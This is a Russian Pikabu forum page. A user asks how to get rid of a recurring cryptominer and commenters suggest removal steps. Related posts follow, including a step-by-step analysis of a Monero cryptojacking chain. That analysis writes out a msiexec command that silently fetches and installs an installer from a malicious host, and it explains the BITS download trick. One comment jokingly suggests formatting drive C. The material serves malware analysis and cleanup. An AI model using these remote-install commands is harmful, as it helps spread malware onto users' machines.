6

Как я поймал майнер tool.btcmine

Доброй ночи пикабушники! Сидел я в интернете. И заметил что начал я подвисать. Думал видюха. Ох... Думал даже экран тупит. Что я только не делал!) Спустя время понял что это майнер. Оказалось он не скрытый. И не собирается скрываться. Даже если писать в строке антивирус. То браузер сразу закрывало. Представьте как это бесило. Виндовс 10. Антивирусник не видит. Боже, сколько я перепробовал антивирусов чтобы убрать это го*но. Антивирусы его видели. Удаляли. Но после перезагрузки компьютера. Все возвращалось. Уже как неделю не могу решить эту проблему. Может у кого-то было подобное? Антивирусы говорят: tool.btcmine.1063. А именно Dr.Web Cureit!. Остальные тоже ругаются. Но оно появляется все равно. Чтобы я не делал. Если у вас такое тоже было то отпишите как убрали эту штуку. Буду очень благодарен.

Дубликаты не найдены

+3

Бгг. У вас стоит его установщик в автозагрузке/планировщике/службе скорее всего. Потому он у вас каждый раз при удалении и устанавливается заново через некоторое время.

Лечение - во первых локализовать, где он стоит. Идете в диспетчер и ищете его процесс, локализуете папку, глушите, удаляете папку.

Потом чистите автозагрузку/планировщик/службы.

Потом, убедившись в том что это не помогло, чистите все незнакомые процессы, удаляете все левые программы.

раскрыть ветку 4
0

Спасибо за ответ! Буду пробовать

раскрыть ветку 3
0
Anvir taskmanager это не антивирус, а некая замена диспетчера задач с автозагрузкой, он показывает вообще весь автозапуск (у меня порядком 600 задач, включая и виндовые), а так же все что заплонировано когда либо запуститься и уровни рисков запущеных, автозагрузке задач.
запускать от администратора.
0
Комментарий удален. Причина: данный аккаунт был удалён
0

На здоровье, пробуйте.

0
Для начала всё же из-под самой винды понаходить стрёмные папочки. Отменить автозагрузку всего что только удастся. Потом зайти с любого LiveCD (лучше даже линуха). И почистить вручную именно файлы/папки. Потом загрузить саму винду но в безопасном режиме - и проверить ещё раз директории. Потом уже зайти нормально в винду и любой чистилкой (хоть си-клинером) поудалять хвосты реестра и мусор
0

На форум "ДОкторВеба" обращались?

Эту ветку смотрели?

https://forum.drweb.com/index.php?showtopic=329196

0
LiveCD или winPE, загружается, проверяешь, чистишь. Если не получилось, переустанавливай.
-1

Не забудьте проверить загрузочный раздел HDD и удалить точки восстановления. Также следует отчистить все временные директории и  почистить реестр. Если стоит  что-нибудь от мейл ру удалить к чертям (очень часто мерзость лезет через их сервисы)

-2

Format C: /FS:NTFS

раскрыть ветку 2
+2
Последний раз такое можно было из под винды сотворить в линолеуме или 98 не помню точно.
раскрыть ветку 1
-1

Ну да! А пальчики-то помнят

-1
Переустанови шиндовс
Похожие посты
15507

Как я скрытый майнер искал

Приветствую тех, кто читает. Сижу значит никого не трогаю, вдруг начинает кулер процессорный шуметь. Понимаю, что кто то начал загружать мой процессор. Ну я бегом в диспетчер задач, а там пусто и кулер затих. Через какое-то время ситуация повторяется. Понял, что вирус поймал. Скачал drweb cureit и adw cleaner - результата ноль. Поиск в интернетах результата не дал. Значит будем руками искать.

Для начала глянул в автозапуск и планировщик задач - ничего подозрительного.

Зашел в process explorer и обнаружил такого зверя:

Как я скрытый майнер искал Вирус, Майнеры, Длиннопост

Командная строка, которая постоянно перезапускается, причем с таймаутом, как будто чего-то ждет. Заходим в свойства cmd.exe и видим:

Как я скрытый майнер искал Вирус, Майнеры, Длиннопост

Командая строка запускается с параметром, ведущим к некому DataTM.cmd. Вот код, который лежит в батнике:

Как я скрытый майнер искал Вирус, Майнеры, Длиннопост

А вот и файлы в папке с ним:

Как я скрытый майнер искал Вирус, Майнеры, Длиннопост

XMR майнер. Маскируется в процессах под steam я так понимаю и вырубается как только был включен taskmgr или похожие "диспетчеры задач".

Это не значит, что все майнеры так прячутся, но как один из вариантов. Надеюсь кому-то поможет.

Вот ",,,," если где забыл поставить.

Показать полностью 2
6374

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Показать полностью 17
1299

Майнеры в раздачах

На одном небезызвестном ресурсе появилась информация по майнеров в раздачах, посему решил создать этот пост дабы люди проверили свои компьютеры.


Далее цитата:


К вам обращается R.G.GameWorks


В связи со сложившейся ситуацией мы хотели бы принести Вам свои извинения за подлые действия нашего члена группы - N1K0LS0N.

Он без нашего ведома, позволил себе залить майнер в пару последних раздач от нашей группы.

Мы крайне огорчены тем, что Вам пришлось испытать трудности с этим. Вирус на компьютере - вещь не из приятных. А майнер, тем более.

С момента создания группы, в 2012 году и по сей день, наша группа радует пользователей Rustorka свежими, а самое главное, качественными релизами ПК игр.

С членами группы R.G.GameWorks была проведена беседа о недопустимости таких действий. Решением было изгнание N1K0LS0N из R.G.GameWorks, а так же пожизненный бан на трекере.

Мы очень сожалеем и надеемся, что этот инцидент не сможет повлиять на Ваше видение о группе в целом. Мы стараемся для Вас.


Удаление майнера:

1. Включить показ скрытых файлов и папок


2. Зайти в локальный диск С, найти в поиске папку Realtek HD (обычно ставится в C:\Users\имя_юзера\AppData\*****\Realtek HD


3. Удалить папку целиком (если не получается - закрыть в диспетчере задач процесс rthdcpl.exe)


Содержимое папки с майнером выглядит так:

Майнеры в раздачах Биткоины, Вирус, Майнеры, Miner

Релизы с майнерами:


HITMAN Anthology / HITMAN Антология (Square Enix) (RUS/ENG/MULTi) [L|Steam-Rip] R.G. GameWorks


Trials of the Blood Dragon (Ubisoft) (RUS/ENG/MULTi10) [L|Steam-Rip] R.G. GameWorks


We Happy Few (Compulsion Games) (ENG/FR) [L|Steam-Rip] R.G. GameWorks


INSIDE (Playdead) (RUS/ENG/MULTi14) [L|Steam-Rip] R.G. GameWorks


No Man's Sky (Hello Games) (RUS/ENG/MULTi12) [L|Steam-Rip] R.G. GameWorks

Показать полностью 1
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: